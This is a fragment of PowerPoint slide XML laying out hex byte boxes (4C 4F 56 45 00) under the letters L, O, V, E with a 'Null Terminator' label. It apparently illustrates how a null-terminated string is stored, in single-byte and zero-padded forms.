            <a:xfrm>
              <a:off x="1403640" y="1917000"/>
              <a:ext cx="1295640" cy="719640"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 16667"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="d8d8d8"/>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800" spc="-1" strike="noStrike">
                  <a:solidFill>
                    <a:srgbClr val="ffffff"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                </a:rPr>
                <a:t>4C</a:t>
              </a:r>
              <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                <a:latin typeface="Arial"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="191" name="CustomShape 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2728800" y="1917000"/>
              <a:ext cx="1295640" cy="719640"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 16667"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="d8d8d8"/>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800" spc="-1" strike="noStrike">
                  <a:solidFill>
                    <a:srgbClr val="ffffff"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                </a:rPr>
                <a:t>4F</a:t>
              </a:r>
              <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                <a:latin typeface="Arial"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="192" name="CustomShape 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4024800" y="1917000"/>
              <a:ext cx="1295640" cy="719640"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 16667"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="d8d8d8"/>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800" spc="-1" strike="noStrike">
                  <a:solidFill>
                    <a:srgbClr val="ffffff"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                </a:rPr>
                <a:t>56</a:t>
              </a:r>
              <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                <a:latin typeface="Arial"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="193" name="CustomShape 7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5321160" y="1917000"/>
              <a:ext cx="1295640" cy="719640"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 16667"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="d8d8d8"/>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800" spc="-1" strike="noStrike">
                  <a:solidFill>
                    <a:srgbClr val="ffffff"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                </a:rPr>
                <a:t>45</a:t>
              </a:r>
              <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                <a:latin typeface="Arial"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="194" name="CustomShape 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6642720" y="1917000"/>
              <a:ext cx="1295640" cy="719640"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 16667"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="d8d8d8"/>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800" spc="-1" strike="noStrike">
                  <a:solidFill>
                    <a:srgbClr val="ffffff"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                </a:rPr>
                <a:t>00</a:t>
              </a:r>
              <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                <a:latin typeface="Arial"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="195" name="CustomShape 9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1910520" y="1525320"/>
              <a:ext cx="314280" cy="457560"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:style>
            <a:lnRef idx="0"/>
            <a:fillRef idx="0"/>
            <a:effectRef idx="0"/>
            <a:fontRef idx="minor"/>
          </p:style>
          <p:txBody>
            <a:bodyPr>
              <a:spAutoFit/>
            </a:bodyPr>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:tabLst>
                  <a:tab algn="l" pos="0"/>
                </a:tabLst>
              </a:pPr>
              <a:r>
                <a:rPr b="1" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                </a:rPr>
                <a:t>L</a:t>
              </a:r>
              <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
                <a:latin typeface="Arial"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="196" name="CustomShape 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3219480" y="1525320"/>
              <a:ext cx="392760" cy="457560"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:style>
            <a:lnRef idx="0"/>
            <a:fillRef idx="0"/>
            <a:effectRef idx="0"/>
            <a:fontRef idx="minor"/>
          </p:style>
          <p:txBody>
            <a:bodyPr>
              <a:spAutoFit/>
            </a:bodyPr>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:tabLst>
                  <a:tab algn="l" pos="0"/>
                </a:tabLst>
              </a:pPr>
              <a:r>
                <a:rPr b="1" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                </a:rPr>
                <a:t>O</a:t>
              </a:r>
              <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
                <a:latin typeface="Arial"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="197" name="CustomShape 11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4515840" y="1535040"/>
              <a:ext cx="367200" cy="457560"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:style>
            <a:lnRef idx="0"/>
            <a:fillRef idx="0"/>
            <a:effectRef idx="0"/>
            <a:fontRef idx="minor"/>
          </p:style>
          <p:txBody>
            <a:bodyPr>
              <a:spAutoFit/>
            </a:bodyPr>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:tabLst>
                  <a:tab algn="l" pos="0"/>
                </a:tabLst>
              </a:pPr>
              <a:r>
                <a:rPr b="1" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                </a:rPr>
                <a:t>V</a:t>
              </a:r>
              <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
                <a:latin typeface="Arial"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="198" name="CustomShape 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5811840" y="1535040"/>
              <a:ext cx="335160" cy="457560"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:style>
            <a:lnRef idx="0"/>
            <a:fillRef idx="0"/>
            <a:effectRef idx="0"/>
            <a:fontRef idx="minor"/>
          </p:style>
          <p:txBody>
            <a:bodyPr>
              <a:spAutoFit/>
            </a:bodyPr>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:tabLst>
                  <a:tab algn="l" pos="0"/>
                </a:tabLst>
              </a:pPr>
              <a:r>
                <a:rPr b="1" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                </a:rPr>
                <a:t>E</a:t>
              </a:r>
              <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
                <a:latin typeface="Arial"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="199" name="CustomShape 13"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6633000" y="1073160"/>
              <a:ext cx="1755360" cy="1188360"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:style>
            <a:lnRef idx="0"/>
            <a:fillRef idx="0"/>
            <a:effectRef idx="0"/>
            <a:fontRef idx="minor"/>
          </p:style>
          <p:txBody>
            <a:bodyPr>
              <a:spAutoFit/>
            </a:bodyPr>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:tabLst>
                  <a:tab algn="l" pos="0"/>
                </a:tabLst>
              </a:pPr>
              <a:r>
                <a:rPr b="1" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                </a:rPr>
                <a:t>Null </a:t>
              </a:r>
              <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
                <a:latin typeface="Arial"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:tabLst>
                  <a:tab algn="l" pos="0"/>
                </a:tabLst>
              </a:pPr>
              <a:r>
                <a:rPr b="1" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                </a:rPr>
                <a:t>Terminator</a:t>
              </a:r>
              <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
                <a:latin typeface="Arial"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="200" name="Group 14"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1403640" y="3144240"/>
            <a:ext cx="6984720" cy="1583640"/>
            <a:chOff x="1403640" y="3144240"/>
            <a:chExt cx="6984720" cy="1583640"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="201" name="CustomShape 15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1403640" y="4008240"/>
              <a:ext cx="663840" cy="719640"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 16667"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="d8d8d8"/>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800" spc="-1" strike="noStrike">
                  <a:solidFill>
                    <a:srgbClr val="ffffff"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                </a:rPr>
                <a:t>4C</a:t>
              </a:r>
              <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                <a:latin typeface="Arial"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="202" name="CustomShape 16"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2728800" y="3987720"/>
              <a:ext cx="647640" cy="719640"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 16667"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="d8d8d8"/>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800" spc="-1" strike="noStrike">
                  <a:solidFill>
                    <a:srgbClr val="ffffff"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                </a:rPr>
                <a:t>4F</a:t>
              </a:r>
              <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                <a:latin typeface="Arial"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="203" name="CustomShape 17"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4024800" y="3987720"/>
              <a:ext cx="674280" cy="719640"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 16667"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="d8d8d8"/>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800" spc="-1" strike="noStrike">
                  <a:solidFill>
                    <a:srgbClr val="ffffff"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                </a:rPr>
                <a:t>56</a:t>
              </a:r>
              <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                <a:latin typeface="Arial"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="204" name="CustomShape 18"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5374080" y="3987720"/>
              <a:ext cx="605160" cy="719640"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 16667"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="d8d8d8"/>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800" spc="-1" strike="noStrike">
                  <a:solidFill>
                    <a:srgbClr val="ffffff"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                </a:rPr>
                <a:t>45</a:t>
              </a:r>
              <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                <a:latin typeface="Arial"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="205" name="CustomShape 19"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6642720" y="3987720"/>
              <a:ext cx="647640" cy="719640"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 16667"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="d8d8d8"/>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800" spc="-1" strike="noStrike">
                  <a:solidFill>
                    <a:srgbClr val="ffffff"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                </a:rPr>
                <a:t>00</a:t>
              </a:r>
              <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                <a:latin typeface="Arial"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="206" name="CustomShape 20"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1910520" y="3321360"/>
              <a:ext cx="314280" cy="457560"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:style>
            <a:lnRef idx="0"/>
            <a:fillRef idx="0"/>
            <a:effectRef idx="0"/>
            <a:fontRef idx="minor"/>
          </p:style>
          <p:txBody>
            <a:bodyPr>
              <a:spAutoFit/>
            </a:bodyPr>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:tabLst>
                  <a:tab algn="l" pos="0"/>
                </a:tabLst>
              </a:pPr>
              <a:r>
                <a:rPr b="1" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                </a:rPr>
                <a:t>L</a:t>
              </a:r>
              <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
                <a:latin typeface="Arial"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="207" name="CustomShape 21"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3219480" y="3321360"/>
              <a:ext cx="392760" cy="457560"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:style>
            <a:lnRef idx="0"/>
            <a:fillRef idx="0"/>
            <a:effectRef idx="0"/>
            <a:fontRef idx="minor"/>
          </p:style>
          <p:txBody>
            <a:bodyPr>
              <a:spAutoFit/>
            </a:bodyPr>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:tabLst>
                  <a:tab algn="l" pos="0"/>
                </a:tabLst>
              </a:pPr>
              <a:r>
                <a:rPr b="1" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                </a:rPr>
                <a:t>O</a:t>
              </a:r>
              <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
                <a:latin typeface="Arial"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="208" name="CustomShape 22"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4515840" y="3330720"/>
              <a:ext cx="367200" cy="457560"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:style>
            <a:lnRef idx="0"/>
            <a:fillRef idx="0"/>
            <a:effectRef idx="0"/>
            <a:fontRef idx="minor"/>
          </p:style>
          <p:txBody>
            <a:bodyPr>
              <a:spAutoFit/>
            </a:bodyPr>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:tabLst>
                  <a:tab algn="l" pos="0"/>
                </a:tabLst>
              </a:pPr>
              <a:r>
                <a:rPr b="1" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                </a:rPr>
                <a:t>V</a:t>
              </a:r>
              <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
                <a:latin typeface="Arial"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="209" name="CustomShape 23"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5811840" y="3330720"/>
              <a:ext cx="335160" cy="457560"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:style>
            <a:lnRef idx="0"/>
            <a:fillRef idx="0"/>
            <a:effectRef idx="0"/>
            <a:fontRef idx="minor"/>
          </p:style>
          <p:txBody>
            <a:bodyPr>
              <a:spAutoFit/>
            </a:bodyPr>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:tabLst>
                  <a:tab algn="l" pos="0"/>
                </a:tabLst>
              </a:pPr>
              <a:r>
                <a:rPr b="1" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                </a:rPr>
                <a:t>E</a:t>
              </a:r>
              <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
                <a:latin typeface="Arial"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="210" name="CustomShape 24"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6633000" y="3144240"/>
              <a:ext cx="1755360" cy="1188360"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:style>
            <a:lnRef idx="0"/>
            <a:fillRef idx="0"/>
            <a:effectRef idx="0"/>
            <a:fontRef idx="minor"/>
          </p:style>
          <p:txBody>
            <a:bodyPr>
              <a:spAutoFit/>
            </a:bodyPr>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:tabLst>
                  <a:tab algn="l" pos="0"/>
                </a:tabLst>
              </a:pPr>
              <a:r>
                <a:rPr b="1" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                </a:rPr>
                <a:t>Null </a:t>
              </a:r>
              <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
                <a:latin typeface="Arial"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:tabLst>
                  <a:tab algn="l" pos="0"/>
                </a:tabLst>
              </a:pPr>
              <a:r>
                <a:rPr b="1" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                </a:rPr>
                <a:t>Terminator</a:t>
              </a:r>
              <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
                <a:latin typeface="Arial"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="211" name="CustomShape 25"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2067840" y="4008240"/>
              <a:ext cx="663840" cy="719640"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 16667"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="d8d8d8"/>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800" spc="-1" strike="noStrike">
                  <a:solidFill>
                    <a:srgbClr val="ffffff"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                </a:rPr>
                <a:t>00</a:t>
              </a:r>
              <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                <a:latin typeface="Arial"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="212" name="CustomShape 26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3376800" y="3987720"/>
              <a:ext cx="647640" cy="719640"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 16667"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="d8d8d8"/>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800" spc="-1" strike="noStrike">
                  <a:solidFill>
                    <a:srgbClr val="ffffff"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                </a:rPr>
                <a:t>00</a:t>
              </a:r>
              <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                <a:latin typeface="Arial"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="213" name="CustomShape 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4699440" y="3987720"/>
              <a:ext cx="674280" cy="719640"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 16667"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="d8d8d8"/>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800" spc="-1" strike="noStrike">
                  <a:solidFill>
                    <a:srgbClr val="ffffff"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                </a:rPr>
                <a:t>00</a:t>
              </a:r>
              <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                <a:latin typeface="Arial"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="214" name="CustomShape 28"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5979600" y="4008240"/>
              <a:ext cx="605160" cy="719640"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 16667"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="d8d8d8"/>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800" spc="-1" strike="noStrike">
                  <a:solidFill>
                    <a:srgbClr val="ffffff"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                </a:rPr>
                <a:t>00</a:t>
              </a:r>
              <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                <a:latin typeface="Arial"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="215" name="CustomShape 29"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7287840" y="3975120"/>
              <a:ext cx="647640" cy="719640"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 16667"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="d8d8d8"/>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800" spc="-1" strike="noStrike">
                  <a:solidFill>
                    <a:srgbClr val="ffffff"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                </a:rPr>
                <a:t>00</a:t>
              </a:r>
